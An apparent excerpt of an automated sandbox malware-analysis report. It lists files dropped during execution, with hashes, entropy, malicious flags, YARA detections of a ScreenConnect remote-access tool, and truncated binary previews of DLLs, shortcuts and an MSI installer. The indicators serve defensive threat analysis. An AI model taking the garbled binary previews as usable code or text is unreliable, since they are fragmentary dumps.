                                      SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):234
                                      Entropy (8bit):4.977464602412109
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                      SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                      SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                      SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):49152
                                      Entropy (8bit):4.62694170304723
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                      SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                      SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                      SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):36864
                                      Entropy (8bit):4.340550904466943
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                      SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                      SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                      SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):57344
                                      Entropy (8bit):4.657268358041957
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                      SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                      SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                      SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):176128
                                      Entropy (8bit):5.775360792482692
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                      SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                      SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                      SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):11776
                                      Entropy (8bit):5.273875899788767
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:73A24164D8408254B77F3A2C57A22AB4
                                      SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                      SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                      SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 17 16:45:48 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2673
                                      Entropy (8bit):3.9875590019920053
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:A003BA36CC7A0DFAF30DB53EFEB0BA28
                                      SHA1:2FDCC7E95396C5E9B4638EAEF2CF252FB2E837F6
                                      SHA-256:29FFCFA997148960B9079FC19868F170F83BE95E8F2D3FA5DF28552124DF4332
                                      SHA-512:32B813E80AE944556CF104C13BACEAA57C956850694E154E5B4065EA5E665D0B51F8033C459CD46FC233DDDE1A2D8786241F60838EB196197439F2CECF3EACC0
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,.........i..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V1Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 17 16:45:48 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2675
                                      Entropy (8bit):4.000504754783289
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:C028FC34ECE05AE0A7C34E4A5942912B
                                      SHA1:210FFF574A8A4AB31A73CE75C5731C5DCA5D032C
                                      SHA-256:056C2C6AD53A8E9C503669BF6292E5DF3C3C475573737F69F0D3DD4BA205FE97
                                      SHA-512:DCBF5F9669E6E6CF38B328B14E93024D322351E715F67454277642BFBFEB1D73CED9958B1F50C52B8C11D0D05741C96B82E99E25EDC67C46EFB3353D3D6C092F
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,....4....i..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V1Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2689
                                      Entropy (8bit):4.0112896730335015
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:23A2EC443CB800BDF17CF6F175C74959
                                      SHA1:4CFA33A9C4478ED5A7D3961271D4A7A42375A5A9
                                      SHA-256:E906594157F96313263506E3E69AF299741E126D408A1FEEEEA884F2D618E7BF
                                      SHA-512:C443EDE30B95341A54894F9C090F6D61E3F0551585BFE35BA9D093F9AD72348976572754B21DF894156E46D205B952834CBD403068BFD6EF74B51AD991C95BC6
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 17 16:45:48 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2677
                                      Entropy (8bit):4.000194245950456
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:F47D3345F66473CAB7B2C9ACECDC0591
                                      SHA1:63DE103DB6B68F98531388372CCD8EFC7893E981
                                      SHA-256:6152B5157AB1818091ACFB69683CA38EFE9762229D93AECA9F8E450EA074D530
                                      SHA-512:878F6B47C73341AAB70C93CB45FE9EF3B1542F0AAE0B21A61E37D8AAF1965B64F220156B6E521688ED50FE77F99AE7B3522E0AFA0F64796EB9B6A9C03AD1A3FD
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,........i..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V1Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 17 16:45:48 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2677
                                      Entropy (8bit):3.9894226125445207
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:DFD4504E6882328575FC5E6654366642
                                      SHA1:A41797B2EFDD003F6833EEE009B168FC2CEA6CE4
                                      SHA-256:44B8E9A4F3EE6B0B8912526609D32CA5C0CAD90F47E1025DCD76DE42558BBD9B
                                      SHA-512:7D6217F69AC239CFF96D6F3E9D6F6D43C559CBC87172BA0522FF8ED09B01B7118FF29C701A726792E5006C9A9EC8D5BF0F83B07AD4721041DC42BF2BDFE8365F
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,.........i..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V1Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 17 16:45:48 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                      Category:dropped
                                      Size (bytes):2679
                                      Entropy (8bit):3.996805603414187
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:348AC6FD4D87E6B42BE1802A59029FBF
                                      SHA1:C62AC502163542B324B6B4619BB9C7F8475DFFBF
                                      SHA-256:368EC4FD3D845E4BF3A01500E0B37D159A87316FA2449D78F63B9747CF339619
                                      SHA-512:05F7EFD5737938CC7502BC638A88E432A201CA818ECF47D6D4E7076FE4F0F3BF97CFE2143EC7A9AC711E4B0AC1356CA2F02524BAE58A4B4CDEBC8A679AD7CA10
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:L..................F.@.. ...$+.,....*....i..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I1Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V1Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V1Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V1Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V1Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):5627392
                                      Entropy (8bit):7.427630642209874
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5A74CB8603DC7543A6CA2B5A91369267
                                      SHA1:21C3EABF63D83446C006CFD4B83EFAEE3E3BDCCC
                                      SHA-256:B6497752BFEA5496404D6EEB8263DC9A0C7B7E53EC980B903EF3AD5FE1C875C3
                                      SHA-512:785C02E7AEA51CA7218B45BD4308C7916ED323F5A9B2B1CB2038DE181ACD36FC897D9426FE022EED01D1E5946C17D4ED85AF86C4FA825A447A473012356C8A5C
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 376437.crdownload, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 376437.crdownload, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 376437.crdownload, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 376437.crdownload, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 376437.crdownload, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 18%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`..t0S..........bT..|....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...t0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):0
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5A74CB8603DC7543A6CA2B5A91369267
                                      SHA1:21C3EABF63D83446C006CFD4B83EFAEE3E3BDCCC
                                      SHA-256:B6497752BFEA5496404D6EEB8263DC9A0C7B7E53EC980B903EF3AD5FE1C875C3
                                      SHA-512:785C02E7AEA51CA7218B45BD4308C7916ED323F5A9B2B1CB2038DE181ACD36FC897D9426FE022EED01D1E5946C17D4ED85AF86C4FA825A447A473012356C8A5C
                                      Malicious:true
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`..t0S..........bT..|....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...t0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):16831
                                      Entropy (8bit):6.471196403746821
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:B32F54326C5886E9E962E4ECE636AD70
                                      SHA1:301B623307E3D602D57798671C7E4C7D544227A2
                                      SHA-256:C93954B12313C9F3309D30A36ED1110EA5383FDD3CA3FA7A4BF77C9D0B57E8BB
                                      SHA-512:33F69B8C3908E1CAC398D2ED8FC27406EB7D4B49A5AD7C4D0E2891F5DA106EBD8A673E0362A928573230A8403101FE27D8879FBBB394B48F101BD7FB93F7A275
                                      Malicious:true
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`..t0S..........bT..|....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...t0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {8FE752F3-A90B-15F1-EEA9-E11C4D88E962}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                      Category:dropped
                                      Size (bytes):13369344
                                      Entropy (8bit):7.967093500196781
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:A6732CDE15B41E69E0B7ED4DF6755A31
                                      SHA1:159F925BCEB920DE998D3C709DB70570FEE3B1BF
                                      SHA-256:478B621CE8230A09D90AC6266D04EC137434214834544CAA86F3831E783B608D
                                      SHA-512:DC00058C0058D4249A5314F452B9CB8E3106AEBD970EECAE9C13E65ABE3425AFD2CCC646F3D41793D0A14060B1B5C02DA0CB5CA2148A839EC81CF66A8EEECC4E
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):423909
                                      Entropy (8bit):6.577071575734462
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:AE2DF12CED3BBABA741A8F5A3D148F48
                                      SHA1:857849DFCB8CBA207147EA16064E3C146B4F7597
                                      SHA-256:F93E17A552A80FF5C6648660C432911A3E05A6EEC75013B8D586FB245B6F2B2D
                                      SHA-512:96412595F3B88F03CE24C865BD642BF40AD45FCDD02B7E89CC9F4C98850A75FB8417D08810EE6CCC94D2FBE3C809FA126549B057CE90CEED8CD996340010526B
                                      Malicious:false
                                      Yara Hits:
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSIE21F.tmp, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSIE21F.tmp, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSIE21F.tmp, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSIE21F.tmp, Author: Joe Security
                                      Reputation:unknown
                                      Preview:...@IXOS.@.....@.e1Z.@.....@.....@.....@.....@.....@......&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E29000A5-D988-BF34-ACFB-64A448AB1544}^.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}f.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}c.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileMa
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):207360
                                      Entropy (8bit):6.573348437503042
                                      Encrypted:false
                                      SSDEEP:
